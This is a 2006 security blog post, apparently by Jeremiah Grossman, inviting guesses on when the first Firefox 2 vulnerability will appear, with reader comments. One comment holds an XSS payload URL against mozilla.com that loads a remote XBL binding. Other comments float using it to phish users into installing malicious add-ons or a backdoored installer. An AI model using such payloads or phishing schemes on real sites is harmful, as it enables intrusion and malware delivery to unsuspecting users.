Monday, October 23, 2006

Place your bets on the first Firefox 2 vuln

On the heals of the Internet Explorer 7 release, comes the much anticipated Firefox 2.0. Officially released tommorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. In IE7 the time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF2.0? I'll say 3 days, post your guess below.

18 comments:

Anonymous said...

48 hours.

Anonymous said...

48 hours.

maluc said...

i'll go with 5 days.. and zero for their website

http://www.mozilla.com/en-US/products/download.html?product=-%22%20style%3D%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3bxx:expression(alert('XSS'))%22%3E%3Cx%20&os=1&lang=1
(easier to just click my name)

maluc said...

well nevermind, bloggers a pain in multiple ways.. but you get the idea..

*points to:*
http://sla.ckers.org/forum/read
.php?3,44,2090,page=21#msg-2090

RSnake said...

Maluc, you rock...

Using that, you can potentially load .xpi through phishing... eesh!

I give it less than a week (and if I worked for Microsoft I'd make sure of that).

RSnake said...

Nevermind you need to find one in addons.mozilla.org or update.mozilla.org, Maluc. At least if you want to be super sneaky.

maluc said...

heh, i'll see what i can do..

but in the meantime, sending phishing emails advertising Firefox 2 with links to mozilla that downloads a backdoored install file could work pretty well too. That's a badly worded sentence but u get the idea..

maluc said...

well.. i found one on addons.mozilla.org .. and persistent. But, don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org

So it can definitely be used for phishing if they can be convinced to click install.. but i'm not sure about an automatic way

Anonymous said...

less than that: http://lcamtuf.coredump.cx/ffoxdie.html

Anonymous said...

The exploitable part of ffoxdie was fixed in the 1.5.0.7 release. What remains is a stack recursion crash due to an insanely deep XML tree.

You can annoy someone, but does not appear exploitable. https://bugzilla.mozilla.org/show_bug.cgi?id=348514

Anonymous said...

Not that that's an excuse for leaving a highly publicised crash in the browser

Anonymous said...

ffoxdie also affects IE7

Disenchant / Sven Vetsch said...

What do you call a vuln? Do you simply mean security related bugs or must there be for example a code execution possibility?

Regards,
Sven

Daniel said...

24 hours for 1st vuln disclosure
32 hours for 1st p0c
48 hours for 1st use of above vuln by phishers/spammers
52 hours for 1st moan by security blog
53 hours for 1st moan by nerd camp

Call me old, but history repeats itself when it comes to software :0)

Jeremiah Grossman said...

Either is fine by me. No need to quibble over sematics.

Sven Vetsch / Disenchant said...

Ok, let's start with something not so difficult. I've posted in my Blog at www.disenchant.ch two ways how someone can bypass the new phishing-filter very easy.

I found these two ways in about 30 minutes so it shouldn't be such a problem to find more ways.

PS:The first one isn't very interesting I know :P

Regards,
Sven

Sven Vetsch / Disenchant said...

It seems like there was an anomaly in my Firefox. Option 2. will not work in the way I described in my Blog. It’s interesting anyway that the message which says that it’s a phishing site poping up about one second later as it does if you directly navigate to the same site. Sorry for false alarm :(

Anonymous said...

4 days

- zeno